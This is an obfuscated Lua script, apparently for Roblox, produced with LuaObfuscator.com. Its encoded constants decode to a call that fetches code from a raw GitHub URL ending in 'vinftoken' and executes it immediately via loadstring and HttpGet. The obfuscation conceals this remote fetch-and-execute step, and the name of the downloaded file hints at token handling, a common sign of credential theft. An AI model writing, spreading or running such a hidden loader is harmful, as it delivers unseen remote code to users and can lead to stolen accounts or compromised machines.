--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v88=0;local v89;while true do if (v88==0) then v89=v2(v0(v30,16));if v19 then local v120=v5(v89,v19);v19=nil;return v120;else return v89;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v90=0;local v91;while true do if (v90==0) then v91=(v31/(2^(v32-(2 -1))))%((5 -3)^(((v33-(1 -0)) -(v32-(2 -1))) + (620 -(555 + (1701 -(1523 + 114)))))) ;return v91-(v91%(932 -(857 + 74))) ;end end else local v92=568 -(367 + 201) ;local v93;while true do if (v92==(927 -(214 + 713))) then v93=(1 + 1)^(v32-(1 + 0)) ;return (((v31%(v93 + v93))>=v93) and ((1 -0) + 0)) or (877 -(282 + 595)) ;end end end end local function v21() local v34=0;local v35;while true do if (v34==(1066 -(67 + 1 + 997))) then return v35;end if (v34==(1270 -(226 + 1044))) then v35=v1(v16,v18,v18);v18=v18 + (4 -3) ;v34=118 -(8 + 24 + 85) ;end end end local function v22() local v36,v37=v1(v16,v18,v18 + (959 -(892 + 65)) );v18=v18 + 2 ;return (v37 * (610 -354)) + v36 ;end local function v23() local v38,v39,v40,v41=v1(v16,v18,v18 + (5 -2) );v18=v18 + 4 ;return (v41 * (30800116 -14022900)) + (v40 * (65886 -(87 + 263))) + (v39 * (436 -(50 + 17 + 113))) + v38 ;end local function v24() local v42=v23();local v43=v23();local v44=(7 -5) -1 ;local v45=(v20(v43,1 + 0 ,(521 -(416 + 26)) -59 ) * ((954 -(802 + 150))^((876 -(368 + 423)) -53))) + v42 ;local v46=v20(v43,37 -16 ,23 + 8 );local v47=((v20(v43,32)==1) and  -1) or (998 -(915 + 82)) ;if (v46==(0 -(0 -0))) then if (v45==(0 + (0 -0))) then return v47 * (0 -0) ;else v46=1;v44=1187 -(459 + 610 + 118) ;end elseif (v46==(4643 -2596)) then return ((v45==(0 -0)) and (v47 * (1/0))) or (v47 * NaN) ;end return v8(v47,v46-(178 + (863 -(10 + 8))) ) * (v44 + (v45/((3 -1)^(52 + (438 -(145 + 293)))))) ;end local function v25(v48) local v49=430 -(44 + 386) ;local v50;local v51;while true do if (v49==(1486 -((3543 -2545) + 488))) then v50=nil;if  not v48 then v48=v23();if (v48==(0 + (859 -(814 + 45)))) then return "";end end v49=1 + 0 ;end if (v49==(775 -(201 + 571))) then return v6(v51);end if (v49==(1140 -(116 + 1022))) then v51={};for v111=4 -3 , #v50 do v51[v111]=v2(v1(v3(v50,v111,v111)));end v49=7 -4 ;end if (v49==1) then v50=v3(v16,v18,(v18 + v48) -(1 + 0) );v18=v18 + v48 ;v49=7 -5 ;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=(function() return function(v94,v95,v96,v97,v98,v99,v100,v101,v102) local v103=(function() return 780 -(162 + 618) ;end)();local v94=(function() return;end)();local v95=(function() return;end)();while true do if ((0 + 0)==v103) then local v117=(function() return 698 -(208 + 490) ;end)();while true do if (v117==(1 -0)) then v103=(function() return 1 -0 ;end)();break;end if ((0 + 0)==v117) then v94=(function() return 0 + 0 ;end)();v95=(function() return nil;end)();v117=(function() return 1;end)();end end end if (v103~=1) then else while true do if (v94==(0 + 0)) then v95=(function() return v96();end)();if (v97(v95, #",", #"|")==(1000 -(451 + 549))) then local v125=(function() return 836 -(660 + 176) ;end)();local v126=(function() return;end)();local v127=(function() return;end)();local v128=(function() return;end)();while true do if (v125==3) then if (v97(v127, #"-19", #"19(")== #"{") then v128[ #"0313"]=(function() return v100[v128[ #"?id="]];end)();end v101[v102]=(function() return v128;end)();break;end if (v125~=(1 + 0)) then else local v130=(function() return 0 -0 ;end)();local v131=(function() return;end)();while true do if ((1384 -(746 + 638))~=v130) then else v131=(function() return 0;end)();while true do if (v131==(203 -(14 + 188))) then v125=(function() return 677 -(534 + 141) ;end)();break;end if (v131==(0 + 0)) then local v179=(function() return 0;end)();while true do if ((1 + 0)~=v179) then else v131=(function() return 1 -0 ;end)();break;end if (v179==(341 -(218 + 123))) then v128=(function() return {v98(),v98(),nil,nil};end)();if (v126==(1581 -(1535 + 46))) then local v180=(function() return 0 + 0 ;end)();local v181=(function() return;end)();while true do if (v180==(0 + 0)) then v181=(function() return 0;end)();while true do if (v181~=(560 -(306 + 254))) then else v128[ #"-19"]=(function() return v98();end)();v128[ #".dev"]=(function() return v98();end)();break;end end break;end end elseif (v126== #".") then v128[ #"asd"]=(function() return v99();end)();elseif (v126==(3 -1)) then v128[ #"asd"]=(function() return v99() -((2 -0)^(30 -14)) ;end)();elseif (v126== #"xnx") then local v186=(function() return 1467 -(899 + 568) ;end)();while true do if ((0 -0)~=v186) then else v128[ #"-19"]=(function() return v99() -(2^(9 + 7)) ;end)();v128[ #".dev"]=(function() return v98();end)();break;end end end v179=(function() return 1;end)();end end end end break;end end end if ((2 + 0)~=v125) then else if (v97(v127, #"[", #",")~= #"[") then else v128[2]=(function() return v100[v128[2 + 0 ]];end)();end if (v97(v127,4 -2 ,2)~= #"{") then else v128[ #"xxx"]=(function() return v100[v128[ #"xnx"]];end)();end v125=(function() return 399 -(115 + 281) ;end)();end if (v125~=0) then else v126=(function() return v97(v95,4 -2 , #"xnx");end)();v127=(function() return v97(v95, #"asd1",5 + 1 );end)();v125=(function() return 2 -1 ;end)();end end end break;end end return v94,v95,v96,v97,v98,v99,v100,v101,v102;end end end;end)();local v53=(function() return function(v104,v105,v106) local v107=(function() return 0 -0 ;end)();local v108=(function() return;end)();while true do if ((867 -(550 + 317))==v107) then v108=(function() return 0 -0 ;end)();while true do if (v108==(572 -(426 + 146))) then local v123=(function() return 0;end)();local v124=(function() return;end)();while true do if (v123==(0 + 0)) then v124=(function() return 1456 -(282 + 1174) ;end)();while true do if (v124==(0 -0)) then v104[v105-#"\\" ]=(function() return v106();end)();return v104,v105,v106;end end break;end end end end break;end end end;end)();local v54=(function() return {};end)();local v55=(function() return {};end)();local v56=(function() return {};end)();local v57=(function() return {v54,v55,nil,v56};end)();local v58=(function() return v23();end)();local v59=(function() return {};end)();for v67= #">",v58 do local v68=(function() return 0 + 0 ;end)();local v69=(function() return;end)();local v70=(function() return;end)();local v71=(function() return;end)();while true do if (v68~=1) then else v71=(function() return nil;end)();while true do if (v69==(285 -(134 + 151))) then local v121=(function() return 1665 -(970 + 695) ;end)();while true do if ((1252 -(721 + 530))~=v121) then else v69=(function() return 1 -0 ;end)();break;end if (v121~=(1990 -(582 + 1408))) then else v70=(function() return v21();end)();v71=(function() return nil;end)();v121=(function() return 3 -2 ;end)();end end end if ((1 -0)~=v69) then else if (v70== #"/") then v71=(function() return v21()~=(0 -0) ;end)();elseif (v70==(1826 -(1195 + 629))) then v71=(function() return v24();end)();elseif (v70== #"19(") then v71=(function() return v25();end)();end v59[v67]=(function() return v71;end)();break;end end break;end if (v68~=(0 + 0)) then else v69=(function() return 0 -0 ;end)();v70=(function() return nil;end)();v68=(function() return 242 -(187 + 54) ;end)();end end end v57[ #"xxx"]=(function() return v21();end)();for v72= #"!",v23() do FlatIdent_1076E,Descriptor,v21,v20,v22,v23,v59,v54,v72=(function() return v52(FlatIdent_1076E,Descriptor,v21,v20,v22,v23,v59,v54,v72);end)();end for v73= #"|",v23() do v55,v73,v28=(function() return v53(v55,v73,v28);end)();end return v57;end local function v29(v61,v62,v63) local v64=v61[1 -0 ];local v65=v61[1502 -(1408 + 92) ];local v66=v61[1 + 2 ];return function(...) local v74=v64;local v75=v65;local v76=v66;local v77=v27;local v78=1087 -(461 + 625) ;local v79= -(1 + 0);local v80={};local v81={...};local v82=v12("#",...) -(1 + 0) ;local v83={};local v84={};for v109=856 -(564 + 292) ,v82 do if (v109>=v76) then v80[v109-v76 ]=v81[v109 + (1172 -((720 -302) + 753)) ];else v84[v109]=v81[v109 + ((4677 -3125) -(1126 + 425)) ];end end local v85=(v82-v76) + 1 + 0 ;local v86;local v87;while true do local v110=0 + 0 ;while true do if (((1 + 0)==v110) or (4134<=3926)) then if (v87<=(2 + (309 -(244 + 60)))) then if ((v87<=(532 -(406 + 95 + 28))) or (164>=2785)) then if (v87<=(1770 -(1749 + 20))) then if (v87==(0 + 0)) then local v132=0 + 0 ;local v133;local v134;while true do if (v132==(1322 -(1249 + 73))) then v133=v86[1 + 1 ];v134=v84[v86[3]];v132=1146 -((942 -(41 + 435)) + 679) ;end if (v132==(2 -1)) then v84[v133 + (2 -(1002 -(938 + 63))) ]=v134;v84[v133]=v134[v86[4 + 0 + 0 ]];break;end end else v84[v86[1902 -(106 + 1794) ]]=v86[2 + 1 ];end elseif (v87>(1 + 1)) then v84[v86[2 + 0 ]]=v63[v86[1 + 2 ]];else v84[v86[5 -3 ]]=v86[6 -3 ];end elseif (v87<=(13 -8)) then if (v87>(19 -15)) then v84[v86[116 -(4 + 110) ]]();else v84[v86[(1711 -(936 + 189)) -(57 + 527) ]]={};end elseif (v87==(1433 -(41 + 1386))) then v84[v86[105 -(6 + 11 + 86) ]]();else local v142=v86[2 + 0 ];local v143=v84[v86[(1619 -(1565 + 48)) -(2 + 1) ]];v84[v142 + (2 -1) ]=v143;v84[v142]=v143[v86[170 -(122 + 44) ]];end elseif (v87<=11) then if ((v87<=9) or (525==2109)) then if (v87>((1151 -(782 + 356)) -5)) then local v147=v86[(273 -(176 + 91)) -(10 -6) ];local v148,v149=v77(v84[v147](v13(v84,v147 + 1 + 0 ,v86[1 + 2 ])));v79=(v149 + v147) -(1 -0) ;local v150=0 -0 ;for v164=v147,v79 do v150=v150 + (66 -(30 + 35)) ;v84[v164]=v148[v150];end else do return;end end elseif ((33==33) and (v87>(7 + 3))) then v84[v86[1259 -(1043 + (314 -100)) ]]=v63[v86[3 -0 ]];else local v153=v86[7 -5 ];v84[v153]=v84[v153](v13(v84,v153 + (1213 -(323 + 889)) ,v79));end elseif ((3054<=4015) and (v87<=(34 -(1113 -(975 + 117))))) then if (v87==(10 + 2)) then do return;end else local v155=0 + 0 ;local v156;local v157;local v158;local v159;while true do if (v155==(1504 -((2238 -(157 + 1718)) + 1141))) then v156=v86[582 -(361 + 219) ];v157,v158=v77(v84[v156](v13(v84,v156 + (2 -1) ,v86[323 -(53 + 267) ])));v155=1 + 0 ;end if (v155==(414 -(15 + 398))) then v79=(v158 + v156) -(983 -(18 + 964)) ;v159=0;v155=7 -5 ;end if ((1871<3382) and (v155==(2 + 0))) then for v176=v156,v79 do v159=v159 + 1 + 0 ;v84[v176]=v157[v159];end break;end end end elseif ((1293<=2166) and (v87>14)) then v84[v86[2]]={};else local v161=v86[852 -(20 + 830) ];v84[v161]=v84[v161](v13(v84,v161 + 1 + 0 ,v79));end v78=v78 + (127 -(116 + 10)) ;break;end if ((v110==(0 + 0)) or (2579<123)) then v86=v74[v78];v87=v86[1];v110=(600 + 139) -(542 + 196) ;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403533Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F78797578797536372F4F746865722D536372697074732F726566732F68656164732F6D61696E2F76696E66746F6B656E7300094Q00047Q00120B000100013Q00120B000200023Q002007000200020003001201000400044Q000D000200044Q000E00013Q00022Q00060001000100012Q00083Q00017Q00",v9(),...);
